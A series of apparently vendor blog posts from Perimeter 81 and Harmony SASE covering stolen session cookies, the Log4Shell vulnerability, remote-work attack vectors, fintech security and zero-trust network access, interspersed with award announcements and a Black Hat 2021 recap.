Cookies are one of the most important web technologies around, even though they are almost as old as the web browser itself. They sometimes have a bad reputation, but there’s no denying that cookies do make our lives a lot easier. They store information that allows us to stay logged in to a site and enjoy a productive experience instead of continually having to re-authenticate and redo the same actions.

However, cookies also represent an opportunity for attackers, who can steal them to conduct a range of illicit activities. For your organization’s SaaS applications, this can lead to the theft or misuse of sensitive data, unauthorized transactions, and much more.

In this case we’re talking about session cookies. Short-lived session cookies–such as those generated by banking sites–are not particularly useful to attackers. Longer duration cookies are, however, since they are used for “active” sessions that can persist for many hours or days.

It’s important to note that session cookies are used to authenticate a user’s identity, meaning they are generated post-MFA. So, when the attacker can “pass-the-cookie” – or use it for a new web session – they can impersonate a legitimate user.

An Ongoing Threat

Session cookies can be stolen in a variety of ways, such as tapping into unsecured Wi-Fi networks, cross-site scripting attacks, phishing, trojans and other malware, and man-in-the-middle attacks.

For a real-world example, consider the Racoon Stealer malware, which is just one of many malware families designed to steal cookies. The hacking group, Lapsus$, reportedly used Racoon Stealer to gain unauthorized access to the systems of video game company Electronic Arts using a stolen session cookie. They created a clone account of an existing EA employee and ultimately absconded with hundreds of GBs of data, including game source code.

In fact, cookie theft is quite common, with an estimated 22 billion cookie records stolen in 2022.

But the focus of this post is not how SaaS session cookies are stolen or even how to prevent it. Instead, we are looking through a zero-trust lens. So, let’s assume that session cookies have already been stolen, what do you do to mitigate this threat?

Defending SaaS Applications

SaaS applications are critical to doing business today, with the average organization using 130 of them. Session cookies for a SaaS application would give the attacker access to the same information and permissions as the legitimate user. This could include sales transactions and internal files. In the instance of a hijacked web mail session, the attacker could access all the user’s emails, send emails that prompt others to take specific actions which benefit the attacker, and more.

Fortunately, it’s possible – and quite simple – to defend against the hazards of stolen session cookies with Harmony SASE SaaS Protection.

Harmony SASE assigns a unique, static IP address to your organization, and only traffic coming from your address will be allowed access to your SaaS applications. Everything else is denied by default.

Even if an attacker has obtained active session cookies which, again, bypass the MFA mechanism, the traffic would simply be blocked by the SaaS server.

Harmony SASE gives you the visibility and control you need to mitigate SaaS security risks.

The easy availability of SaaS means convenient access for your team members, wherever they’re located, but it also gives attackers ample opportunity to probe for security gaps. With 55% of security executives reporting a recent SaaS security incident, it’s clear that the attacks aren’t going away.

In addition to a unique IP address, Harmony SASE also lets you align users’ access and permissions with their roles and responsibilities. This keeps everybody “in their lane” and prevents unauthorized access to applications and data.

Harmony SASE also provides real-time visibility and easy reporting of the users and devices that connect to your SaaS apps. If you ever have reason to suspect unauthorized activity, a user and all their devices can be logged out with the click of a button. This is also handy when an employee leaves, as their access to all SaaS apps can be instantly turned off.

Visit our Harmony SASE page to learn more about protecting your SaaS applications.

Illustration of Log4j


Cybercrime and Risk Continue Unabated

Cybercrime and its damages are steadily rising with no sign of stopping. It is estimated that cybercrime will have inflicted $6 trillion worth of damage in 2021.

Look no further than the recently discovered Log4j vulnerability, a flaw in a widely-used, open-source logging program that allows cybercriminals to take over the networks and servers of any websites running the program. Since Log4j is so commonplace (many governments, financial institutions, and large companies use it to help keep track of activities on their servers), the vulnerability has sent the Internet reeling. It’s such a big deal that The Cybersecurity and Infrastructure Security Agency (CISA) has released a tool for identifying vulnerable web services.

And while the Log4j vulnerability is not the first supply chain vulnerability we’ve faced this year—although it may be the most significant and most widespread—there are other attack vectors equally menacing that shouldn’t be overlooked. According to Perimeter 81’s State of Cybersecurity Report, 87% of companies will have hybrid workers in 2022. The larger attack surface potentially leaves many companies and their employees more susceptible to cybercriminals who will try to exploit the following attack vectors:

1. Credentials

It may feel like a nuisance, but your username and password, credentials, provide you direct access to sensitive information. Criminals also want access to that information. As our CEO Amit Bareket states, “No one should use plain passwords for the master password with password managers like LastPass. The importance of a secure master password cannot be understated. If a hacker gets it, they’ll have access to all of your passwords. It’s much better to use multifactor authentication (MFA, 2FA) or biometric authentication–which cannot be exposed from a phishing attack.  Biometric authentication is embedded today in almost every device and should be the option of choice.”

Unsafe practices make it easier for hackers to wreak havoc once they successfully hack a password. Dangerous behavior includes password sharing (i.e., giving your credentials to a coworker who gets hacked), using easily guessed passwords (discovered by viewing your social media), or using the same password for multiple applications (such as your personal email and work applications). 

There are several ways hackers gain access to confidential data, and one of the most common and effective methods is phishing. Phishing is used to mimic an authentic source, such as an email from a colleague or a web service, and tricks users into entering sensitive information, like credentials. After the data has been collected, the hackers use it to their advantage. 

Unfortunately, spammers are also persistent and patient. They will continue to bombard people until they are successful. Due to the shift to working from home, many hackers have switched to targeting remote employees. Eventually, one of these criminals will achieve their goal, and this is why it is imperative to set up a cyber insurance plan. Insurance acts as a safety net from the cost of a ransomware attack or a leak, or a breach of confidential data. You should carefully choose a comprehensive plan that will cover both the response and the legal costs.

2. Trust (and Zero Trust)

Businesses rely on employees, partners, and contractors with access to their internal networks to help protect their private data. Anyone with access to this information can be a threat to company security. IBM Security’s report, The Cost of Insider Threats 2020, lists the top causes of insider threats as negligence, credential theft, and criminal insiders. As previously stated, it is only a matter of time until a hacker is successful.

Remote access leaves networks exposed to more threats than found in a typical office – personal devices that could already be corrupted or misconfigured as well as unsecured internet from a public place. Hackers can easily eavesdrop on unencrypted data on these insecure networks, but VPNs can be used to encrypt and protect the information sent across the web. 

Unfortunately, hackers can sometimes break the encryption or take advantage of other VPN vulnerabilities (e.g., phishing for log-in credentials). This allows them to easily siphon information unbeknownst to the victim.

Once a breach has occurred within a trust network, criminals will exploit their entrance since re-verification is not needed. This is why many companies are switching to a Zero Trust Network Access (ZTNA) model in which users must be continually verified through two-factor authentication. Each company can define when verification needs to reoccur, and some choose to validate users when they switch tasks or when a user has been inactive for a set amount of time. 

The ZTNA model also has strategies to improve cyber security, like creating trust zones where operations with the same level of trust are zoned together. This limits the number of pathways to that area, making it easier to track and more challenging to get in. Moreover, this model provides a solution to limiting the range access of external users like partners and contractors. Even if one of these outside operators becomes corrupted, you will be able to revoke their clearance, determine what areas to investigate for stolen information and malicious content, and prevent further loss.

3. Outdated Software and Devices

There are now more devices and weak points for IT departments to manage, and thus more patches, updates, and devices to maintain. Additionally, the average developer has less than five years of cumulative working experience, so it is paramount to select someone who can manage a hybrid workplace. 

This has become increasingly important as cyberattacks increased in 2021. In particular, there was a series of attacks on Microsoft Exchange Servers n July. A set of vulnerabilities known as ProxyShell were used to target business email accounts, and criminals could commit more attacks from what would be considered a legitimate user. A patch was rolled out to correct these weak spots, but there are still thousands of unpatched servers.

Outlook, Office 365, and other cloud services did not experience this manipulation. Many companies are switching to cloud services since they offer more comprehensive security. Cloud services have begun to use AI to continually search and test for weaknesses in their systems and automatically roll out patches and updates. 

One study surveyed over 15,000 participants worldwide to learn more about their habits surrounding device updates. It was found that 40% of participants felt that it was the employers responsibility to update devices, and 50% of participants clicked the remind me later button when prompted to update their personal devices. This further emphasizes the need for automatic updates and patches to prevent exploits from outdated software and devices.

4. Missing or Poor Encryption

Encryption adds an extra layer of security to your sensitive data. Missing encryption leaves a straightforward path for hackers to get at your data, and poor encryption can be quickly broken. 

Some encryption comes built into systems like email encryption or HTTPS, and there has been a rise in virtual private networks (Cloud VPN), which encrypt your online activity. These features are nice and helpful; however, they should still be reviewed to know they are doing what they’re supposed to – protecting your confidential data. Become aware of vulnerabilities and mitigate their risk. There are also several preventative strategies you can use to reduce the chance your VPN will leak information.

5. The Internet Connection

In the New World of Work—which isn’t so new anymore— 87% of companies have hybrid workers. With so many workers accessing company data from different places, it is paramount to understand, educate, and implement strong Internet connection security habits. Employees should ensure that their routers have the software updates and use a strong, randomly generated password.

Employees work on many collaborative projects, and cloud computing makes all of the data easily accessible. While it may seem counterintuitive to host everything in the cloud, it has become the most reliable and secure way for businesses to store their data.

Summary

This is not a comprehensive list of the tactics used by cybercriminals, but it does highlight the common attack vectors found in WFH workplace. And everyone must be ready. Cybercrime doesn’t happen to other people or other companies. It can happen to all of us. 

According to our study, 66% of companies had a serious cybersecurity incident in 2020-21.  And while 25% did not have any costs or damages from the incident—presumably because they have mitigation techniques in place—the other 75% did. Damage to their reputation. The cost of a ransom. And the costs of downtime or not generating an income. And then there are the cleanup costs. While 18% reported that the costs of a cyber incident were less than $100,000, 47% reported that the costs were between $100,000 and $1 million, and 10% said costs were more than $1 million.

It’s no wonder that many companies are implementing ZTNA using Perimeter 81, a Forrester New Wave ZTNA leader.  

9 G2 Awards


Nine Badges for Zero Trust Networking, Cloud Security and Software-Defined Perimeter

G2, one of the world’s largest online tech marketplaces and software review platforms has named Perimeter 81 as a High Performer for its consistently high customer reviews for Zero Trust Networking, Cloud Security, and Software-Defined Perimeter. Additional awards and badges for Winter 2022 included Momentum Leader, Easiest Admin, Best Support, and Best Relationship.

The G2 software review platform includes more than 1.3 million trusted and verified user assessments covering 100,000 software and service companies in 2,000 categories. These include both quantitative ratings and qualitative reviews about customer likes, dislikes, recommendations, and business use cases. 

Perimeter 81’s High Performer status means that it is one of the highest-ranked cybersecurity solutions in the Zero Trust Networking, Cloud Security, and Software-Defined Perimeter categories. 

In Q3/2021, Perimeter 81 was cited as a Forrester New Wave Leader for Zero Trust Networking Access.

Recent G2 customer reviews include:

  • The best connection tool I have used (out of many!). As a consultant, I use many different connection tools, and Perimeter 81 is by far the best… Great user experience, can’t recommend highly enough, and I’m using about 20 different similar tools at the moment.

     

  • “Best Enterprise VPN. One of the best Enterprise VPN available in the market. The best part is tech support. Literally, in minutes they reply and solve your queries on the same day or within the same hour too. If you are running an enterprise company or startup, I would definitely recommend Perimeter81 VPN.”

     

  • Great software VPN solution. The software has a bold and intuitive user interface that displays helpful status information. The software automatically and seamlessly updates itself when required, which is excellent!”

     

Momentum Leader Badge Cites the Company’s Rapid Growth

Perimeter 81 was also cited as a Momentum Leader. According to G2, the Momentum Grid® highlights high-trajectory products software buyers need to know in today’s ever-evolving tech landscape. Perimeter 81’s ranking was based on user satisfaction scores, employee growth, and digital presence. In addition, the Momentum Grid identifies products that are outpacing industry growth with innovation that meets the evolving needs of their users. 

Thank you to all of our wonderful customers. Your reviews of the world’s first Cybersecurity Experience Platform have helped us achieve these fantastic G2 awards. Your success inspires us, and it’s an honor to keep radically simplifying your cybersecurity in 2022.

 


A Discovery That Shook the Internet

On Thursday, December 9, 2021, a security researcher discovered a severe zero-day vulnerability in the Log4j log collection framework used for Java applications. This specific vulnerability (CVE-2021-44228) is called “Log4Shell.” The problem is that the Log4j framework is particularly straightforward and follows its requests without any vetting or verifications. This “100-percent trust” approach allows hackers to execute code by sending a specific request that will execute a payload of code inside a string of code or commands.

As a result, any Java application or device containing Java that is connected to the public Internet can be accessed by hackers to perform all sorts of commands, including the installation and operation of malicious code. 

The Microsoft Security Response Center reports that most Log4Shell activities to-date have been mass scanning and fingerprinting by hackers—probably for future attacks—as well as scanning by security companies and researchers. Other observed activities have included installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems. 

Who or What can be Affected?

The discovery of this zero-day vulnerability has created a virtual earthquake because it affects anything that uses Java. Any servers exposed to the Internet, and have Java applications with the affected Log4j library are at risk. According to Wired magazine and Dark Reading, hundreds of millions of devices are potentially affected. As a result, a lot of companies have been—and still are—very busy over the last few days updating their code with the Log4j update.

Major tech vendors and services such as Amazon Web Services, Cisco, Google Cloud, IBM, and Microsoft have all reported that some of their services were vulnerable and have been quickly working to fix any issues, release software updates where applicable, and advise customers what they should do.

What We are Doing or Have Done

Since the Log4j flaw was discovered, networking experts at Perimeter 81 have been:

  1. Identifying any potential instances of the vulnerable Log4j code in our environment
  2. Assessing the impact and upgrading our systems and infrastructure where applicable
  3. Mitigating any vulnerabilities with any third-party solutions we use
  4. Having our developer and technical teams fix any software or firmware issues as soon as possible

What You Should be Doing

  1. Closely follow the announcements from Perimeter 81 and your other IT vendors to see if any of your IT resources are at risk
  2. Implement software and firmware patches as soon as they become available for your non-cloud resources
  3. Monitor your network for unusual activity
  4. Communicate with your employees, customers, and partners
  5. If you are only using selected features of Perimeter 81 have not yet implemented ZTNA now is the time to start. Please contact our Customer Support for assistance.

Why Perimeter 81 and ZTNA Minimize Your Risk

Perimeter 81 takes a zero-trust approach to its solution and services and should minimize your risk. If you have implemented a Zero Trust Network Architecture (ZTNA) with Perimeter 81, your servers are not publicly exposed to the Internet, but only to users who meet certain rules and are allowed past your hardware firewall or Firewall as a Service (FWaaS). 

Although there are very few services that must be open to the public Internet, such as a corporate website, they are easy to track and maintain. Using ZTNA to protect and hide all of the internal services from public access mitigates the Log4Shell vulnerability by only passing activity logs within the internal network, and does not allow them to be sent outside the local network over a public Internet connection.

Perimeter 81’s ZTNA significantly reduces the attack surface and potential damage to the internal network since you are able to precisely control and limit any traffic generated from outside or inside the network. This is the opposite of the “100% trust approach” of the Log4j flaw. By segmenting your cloud or hybrid network with ZTNA, you can also prevent the spread of malicious code or activity within your organization’s network and its resources.

SINET16 Innovator Award Winner

 

An”Innovative and Compelling” Cybersecurity Company

The Security Innovation Network (SINET) has selected Zero Trust Network Access and SASE leader Perimeter 81 as a  2021 SINET16 Innovator award winner. The award is given to the 16 most “innovative and compelling” companies addressing cybersecurity threats and vulnerabilities.    

The 16 winners were selected from among 190 applicants from 18 countries. The applicants were evaluated in a series of two rounds by the SINET Judging Committee, comprised of 117 Fortune 500 CISOs, government and private industry Risk Executives, and the world’s leading venture capitalists and investment bankers.  

 

Affirmation of Hard Work and ZTNA and SASE Leadership

“Being named a SINET 16 Innovator is an affirmation of our hard work and the strength of our unique product vision,” says Amit Bareket, CEO and Co-Founder at Perimeter 81. “This honor comes at a very thrilling time at the company in which we are rapidly scaling and solidifying our position as a leader in Zero Trust Network Access (ZTNA) and the Secure Access Service Edge.” 

“The era of the classic hardware-based VPN for accessing the corporate network is over,” says Sagi Gidali, CPO and Co-Founder of Perimeter 81. “As we’ve seen in the news, network access in today’s hybrid workplace can only be truly secure through cloud-based Zero Trust Network Access and SASE solutions like Perimeter 81. The Internet has become the corporate network, and employees must be granted access to networking resources based on who they are and what they need to do—not where they are located.” 

Simplifying Cybersecurity for the Hybrid Workforce

Perimeter 81 simplifies cybersecurity and secure network access for the hybrid workforce by transforming multiple outdated, complex, hardware-based network security technologies into a single, easy-to-use, cloud-based security platform, including Zero Trust Network Access, Firewall as a Service, VPN as a Service, Device Posture Security and more. The company’s offering is designed to be easy to buy, quick to implement, and simple to use on a day-to-day basis, both for IT professionals and non-technical users of networking resources.

Perimeter 81 improves network visibility and delivers seamless onboarding and full integration with AWS, Azure, Google Cloud, Splunk, and other major cloud providers. Since its founding in 2018, Perimeter 81 has been selected for numerous other awards, including Forrester’s New Wave Leader for ZTNA, Deloitte’s Technology Fast 500, Gartner Cool Vendor recognition, the Red Herring Top 100, CRN Emerging Vendor, and more.

“I am excited to announce this year’s class of the SINET16 Innovators who are emerging as leaders in their field and paving the way for critical security advancements into multiple government agencies and industry sectors,” said Robert D. Rodriguez, Chairman of SINET. “We look forward to watching these companies continue to grow and help protect our national security and economic interests.”

Read more about Perimeter 81’s ZTNA leadership in The Forrester New Wave™ Zero Trust Network Access Report Q3/2021.

Illustration Forrester ZTNA Leader

 

Intuitive and Modern ZTNA Management

Forrester has named Perimeter 81 as a Zero Trust Network Access leader and gave Perimeter 81 the highest marks possible in the nonweb and legacy apps, client support, product vision, and planned enhancements criteria.    

The leading technology consultancy found that “Perimeter 81’s ZTNA management is intuitive and modern. Its ability to handle nonweb applications like VoIP is a major differentiator in this field.” In addition, they noted that Perimeter 81 is “the best fit for smaller enterprises that need ZTNA as a service, quickly. [Its] self-service portal allows smaller organizations to sign up quickly and onboard dozens of applications in less than a month.”

In addition, the independent analyst also noted that “Perimeter 81 reference customers are among the most enthusiastic of those included in this evaluation. They extol the vendor relationship, support, and dedication to improving the product quickly.”

 

Validating Our Strategic Direction

“We are thrilled that Forrester has named Perimeter 81 a leader in Zero Trust Network Access,” says Amit Bareket, CEO and Co-Founder at Perimeter 81. “This recognition validates for us our strategic direction for enabling secure network access in the hybrid workplace. There is one company network called the Internet, and employees need to access networking resources  based on who they are and what they need to do—not where they are located.”

The Forrester New Wave™ report is Forrester’s evaluation of top products in an emerging technology market. In the report, Forrester assesses these products’ core capabilities and strategies and enables companies to make well-informed decisions without spending months conducting their own research.

For the New Wave™ Zero Trust Network Access Report Q3 2021, Forrester examined the 15 most significant vendors in this category.

Perimeter 81 simplifies cybersecurity and secure network access for the hybrid workforce by transforming multiple outdated, complex, hardware-based network security technologies into a single, easy-to-use, cloud-based security platform, including Zero Trust Network Access, Firewall as a Service, VPN as a Service, Device Posture Security and more. The company’s offering is designed to be easy to buy, quick to implement, and simple to use on a day-to-day basis, both for IT professionals and non-technical users of networking resources.

 

Recent Breaches Show Need for Secure Access

“The downside of flexible, hybrid work is that it has increased the attack surface of every company,” says Sagi Gidali, CPO and Co-Founder of Perimeter 81. “The recent wave of data breaches and ransomware, from the Colonial Pipeline to the T-Mobile breach, has demonstrated that secure access is a must-have for businesses of all types and sizes. As a young, rapidly growing company, we are especially grateful for the industry recognition in The Forrester New Wave report and our customers’ high level of enthusiasm. We believe both are a testament to our determination to provide the highest levels of cybersecurity with a relentless commitment to our customers’ success.”

Perimeter 81 improves network visibility and delivers seamless onboarding and full integration with AWS, Azure, Google Cloud, Splunk, and other major cloud providers. Since its founding in 2018, Perimeter 81 has been selected for numerous other awards, including Deloitte’s Technology Fast 500, Gartner Cool Vendor recognition, the Red Herring Top 100, CRN Emerging Vendor, and more.

Our First In-Person Show Since Covid

We were super excited to be back this year for Black Hat USA’s hybrid event. We’d arranged to have a booth on the floor of the Mandalay Bay in Las Vegas as well as a virtual booth in which visitors could stop by and request a live product demonstration.

Our theme was built around our SASE for Superheros eBook (definitely worth a read!). We took a fun and light-hearted approach, in true Black Hat style. It was also well-suited for coming out of our Covid-induced hibernation.

We had a caricature artist at the booth to transform security pros into organizational superheroes as well as some great swag, including wireless earbuds, wireless speakers, and cool stickers (an homage to one of our founder’s first startup as a nine-year-old kid).

 

A Pre-Show Surprise

Preparations for the exhibition and travel plans seemed fairly normal. It felt good to have Covid behind us. But then, bit by bit, the Delta variant was all over the news. It started to cast a shadow over the whole event, but we were hopeful.

Then on August 1, just days before the show, the organizers announced that exhibitors and visitors would need to wear masks inside and that the requirement would be strictly enforced.

Would this reduce attendance?

Coexisting with a New Mask Mandate

Black Hat 2021 was nothing like the pre-Covid days with tens of thousands of visitors. But that doesn’t mean it wasn’t a success. The hybrid combination of having a virtual and in-person event was smaller, but attendees were much more ready to do business.

The Delta variant—and the show’s mask mandate—may have kept the tourists away, but IT pros and CISO who came to see the best technology on the market and hear from industry leaders weren’t disappointed. And they were ready to do business.  Leads were lower but more serious and interest in demos was high. With ransomware on the rise, interest in SASE and Zero-Trust Network Access is high.

Having a parallel virtual event was good, but it didn’t offer the same dynamics as approaching a passerby on the show floor.

 

Perimeter 81 team at Black Hat 2021

 

The Show Must Go On

Despite the challenges, Black Hat 2021 was indeed successful. Virtual attendees said that they hope to attend in person next year, but it’s clear that Covid still has a major effect on events. This is especially true with the sudden outbreak of the Delta variant.

Like the hybrid workplace, hybrid events are here to stay for the foreseeable future, possibly forever. It’s challenging today to plan for exhibitions because changes can happen in an instant. 

The bottom line is that you need to stay resilient—like your network. 

 

Though the ripples are gentler than they once were, the wake of the 2008 financial crisis is still felt today. Financial regulators around the world have since adopted laws that increase transparency and scrutiny alike, making it difficult for traditional banks to operate as opaquely they once did. This has opened the market-wide for tech-assisted financial services that people like to refer to as fintech.

It’s a mistake to assume that fintech innovations come from independent programmers or garage development shops, though it has lowered the barriers to entry for providing financial services. Almost all of the world’s biggest banks and institutions invest heavily in fintech for their own products in order to stay competitive, and accordingly the market is enormous, estimated to claim upwards of $4.7 trillion of the sector’s total revenue

However, opening a market may also mean exposing something within it, and alongside a rash of serious breaches in the last decade, fintech’s pace of innovation is now threatened by its inability to be a trustworthy custodian of customer data.

Technology Both a Catalyst and a Cure

The fintech sector is responsible for many new ideas. Some of them are improved versions of products and investment instruments that we already have. For example, an online lender can use an algorithm to match someone’s credit profile with applicable lenders, and within 24 hours complete a credit check, and approves the loan. Other ideas, like crowdfunding, robo-advisors, and mobile payments, are entirely new and can only have come into existence with modern technology. 

Despite the increased convenience of fintech services, customers are increasingly concerned about the handling of their personal and financial data. The July 2020 breach of Dave, a US-based fintech, exposed the details of 7.5 million users on the darkweb. Additional data breaches in the sector have perked up regulators’ ears as well.

When using fintech services, you must enter your credit and identification details into an online database. This information trades hands, and is processed and sometimes even stored or shared externally. While it may result in a loan approval 100 times faster than going to your local bank, meeting with a loan agent, and filling out forms, fintech comes with risks that customers shouldn’t be forced to consider.

Even after GDPR laws went into effect, cyberattacks on EU companies continued to increased to a rate of one attack every five minutes and damage is hurtful to customers, the fintech’s brand and their bottom line. For organizations in the sector, the innovation and the intricacy of data structures have resulted in growth, even while customer trust may lag behind. Regulations like GDPR and MiFID II are pushing against this notion, just in time for technology like Zero Trust security to provide an answer.

Zero Trust: Few Can Step Into the Vault

What makes a brick-and-mortar bank so safe? Because banks trust no one. Not visitors, not customers and not employees. Cameras watch all entrants and occupants. The bank’s money is tucked away behind layers of security, including many walls and floors. Only a few employees have access to the vault—where the customers’ most sensitive possessions are—and there are alarms everywhere.

So how can online financial services providers achieve this same level of security? 

Online finance companies and banks can regain the confidence of the market by using Zero Trust solutions. At a time when hackers are increasingly sophisticated, Zero-Trust Security solutions trust no one and grant access to network resources only after the identity of a user has been confirmed.

Zero Trust solutions offer the following technique to give IT teams control over which employees can access various parts of the network:

  • Segmented policy access: Zero Trust creates specific user access policies at the individual application and file level, rather than providing full access to any employee who has a password. Employees of financial institutions receive access to the least amount of sensitive resources required to do their jobs and no more. This significantly reduces the number of relevant targets for hackers and decreases potential impact of employees with less-than-ideal security habits. However access is often synonymous with speed, and banks that deliver high levels of customer service using “universal bankers” can rely on other aspects of Zero Trust.
  • Network monitoring: Monitoring the network activity of users is central aspect of Zero Trust and is the online equivalent of the cameras that watch and record all activity inside the brick-and-mortar bank. A central management dashboard reduces the manpower requirements of monitoring and can also funnel data to other processing tools that look for deeper insights. Suspicious activity is completely visible to IT, which can then access the threat and take mitigating action if necessary. Zero Trust also offers concrete proof or a historical record for insurance purposes and compliance reporting.
  • Secure network access: Multiple layers of identification and protection at the edge of the network requires employees to first connect through an application before granted access to network resources. Encrypted IPSec tunnels, provided by a standard enterprise VPNbusiness VPN, or IPsec VPN stretches across both the network and the cloud. Additional cybersecurity safeguards include automatic Wi-Fi protection (which cuts the internet off should the VPN connection fail), multi-factor authentication for additional device-based security, and DNS filtering tools that limit the access to potentially dangerous Internet content.

Trust is an Achilles Heel

With Zero Trust tools, IT teams at banks and fintech companies can safely abandon the antiquated defenses they posted at the network perimeter. Zero Trust lets them build a more agile, aggressive security apparatus that focuses on users and employees. This is important because financial breaches often occur due to employee sloppiness or negligence rather than an intrepid hacker genius. Two cases in point are Equifax’s failure to install a software patch affected 143 million people in the USA and JP Morgan’s failure to install 2-factor authentication on critical servers resulted in the exposure of the names, addresses, phone numbers and e-mail addresses of 83 million account holders. 

Since Hackers search endlessly in repetitive fashion across employees, devices, and systems for these kinds of human errors, Zero Trust not only makes gaps less common but also reduces their impact. It’s the type of safety net that helps organizations like healthcare providers and financial service providers and comply with industry regulations and meet customer expectations without reducing their pace of innovation.

Zero Trust is an alternative IT security model that remedies the shortcomings of legacy technology by removing the assumption of trust.

Under the guiding principle, “Never trust, always verify”, Zero Trust restricts access to the entire network by isolating applications and segmenting network access based on user permissions, authentication and verification.

Conventional security models that “trust, but verify”, fail to meet increasingly sophisticated cyber threats, hyper interconnectivity, globalization and user mobility. By assuming everything “on the inside” can be trusted, these legacy technologies are, for the most part, no longer effective.

Zero Trust network security ensures policy enforcement and protection for all users, devices, applications and data, regardless of where they’re connecting from.

This user-centric approach makes the verification of authorized entities mandatory, not optional.

The Benefits of Adopting Zero Trust Principles

Zero Trust provides adequate visibility, control and threat inspection capabilities that are necessary to protect your network from modern malware, targeted attacks and the unauthorized exfiltration of sensitive data.
By migrating to a Zero Trust architecture, organizations can experience several technical and business advantages, including:

  • Mitigating Data Loss
    Dramatically enhance your security posture and mitigate data loss via visibility, safe enablement of applications and threat prevention.
  • Effortless Compliance
    Simplify compliance with highly effective trust boundaries by segmenting sensitive resources into many small perimeters that are secured and segmented based on user policies and permissions.
  • Enabling Mobility and Virtualization
    Increase the ability to accommodate transformative IT initiatives such as cloud computing, infrastructure virtualization, user mobility, social networking and more.
  • Reducing TCO
    Reduce total cost of ownership (TCO) for IT security by replacing disconnected point products with a single, consolidated security platform.
  • Increasing Security
    By adequately accounting for encrypted traffic and filtering for known threats, organizations can prevent sophisticated cyber threats from penetrating perimeter defenses and moving laterally across the internal network thanks to a solid business VPN solution.

The Zero Trust Model – How it Works

Internal networks are comprised of different levels of trust which should be segmented according to sensitivity. Organizations looking to establish secure “trust boundaries” according to the Zero Trust model need to improve their defensive posture through:

  • Network Segmentation
    Network segmentation allows organizations to define internal trust boundaries to granularly control traffic flow, enable secure network access and implement network monitoring. This reduces the attack surface and provides a distributed security solution which operates as a holistic threat protection framework.  
  • Trust Zones
    Trust zones are comprised of distinct pockets of infrastructure where resources operate at the same trust level and similar functionality such as protocols and types of transactions. This minimizes the number of allowed pathways and limits the potential for malicious threats to access sensitive resources.
  • Infrastructure Management
    Zero Trust segmentation relies on the ability to efficiently monitor the network via centralized management capabilities. This allows data to be processed by out-of-band analysis tools and technologies that may further enhance network visibility, detect unknown threats, or support compliance reporting.

5 Tips to Get Started with Zero Trust Network Security

It is important for IT security managers and architects to realize that it’s not necessary to wait for the next network and security infrastructure. By obtaining unparalleled visibility into enterprise computing activity, organizations can incrementally and non-disruptively make the transition to a Zero Trust model.

Here are 5 tips to get started with a Zero Trust approach to network security:

Tip #1: Secure Network Access

To get started, it’s critical to ensure that all resources are accessed securely, regardless of location. Network security, implemented via a client application for endpoints, allows for secure IPsec and SSL VPN connectivity for all employees, partners, customers and guests no matter where they’re connecting from (e.g., remotely, on the local network, or over the Internet).

Additional policies determine which users and devices can access sensitive applications and data. This requires multiple trust boundaries, increased use of secure communications to and from resources and more.  

Tip #2: Inspect and Log ALL Traffic

To accurately monitor what’s happening in the network, organizations must identify and classify all traffic, regardless of ports and protocols, encryption or hopping.

This reiterates the need to “always verify” while also making it clear that adequate protection requires more than just strict enforcement of access control. It also eliminates methods that malware may use to hide from detection.  

Tip #3: Least Privilege Access Control

Many legacy solutions are limited to port and protocol-level classification, resulting in too much unfiltered traffic. With granular access control, users can safely access appropriate applications and data by reducing available pathways and eliminating unauthorized and malicious traffic from the network.

With a least-privileged strategy and strictly enforced access control, organizations can define user interactions with resources based on relevant attributes, including application access, user and group identity and the sensitivity of the data being accessed.

Tip #4: Advanced Threat Protection

Legacy security that relies on stateful inspection technology is incapable of enforcing a least-privileged policy because their classification engines only understand IP addresses, ports and protocols – meaning they can’t distinguish between specific applications.

To implement Zero Trust, comprehensive protection against both known and unknown threats, including threats on mobile devices, is necessary to support a closed-loop, highly integrated defense stature that consistently and cost-effectively enables trust boundaries.

Tip #5: High-Performance Design

Since Zero Trust relies on numerous security and networking capabilities, these features must be implemented in a way that doesn’t hinder performance. The Perimeter Zero software architecture minimizes latency and surpasses processing requirements, providing high availability, avoiding loss of service and increasing the uptime of your network.

With unmatched visibility and control of applications, users, and content, organizations can migrate to Zero Trust network security with a highly flexible solution made possible by non-disruptive deployment.

Convert to Zero Trust on the Fly

Because every successful Zero Trust initiative depends on the right solution, organizations can feel confident that they can implement Zero Trust network security without needing to modify the existing network.

Perimeter 81’s software-defined perimeter Zero Trust access feature, called Perimeter Zero, provides a completely transparent experience for all users by enabling access to web applications, SSH, RDP, VNC or Telnet, through resilient IPSec tunnels – without an agent.

All your organization’s employees can easily go to their application portal, select the application they have permission to enter and create a session that is fully audited, recorded and monitored.

With secure, segmented and audited access to cloud environments, applications and local services, Zero Trust increases security, auditing, monitoring and visibility while reducing help-desk support and hardware spending.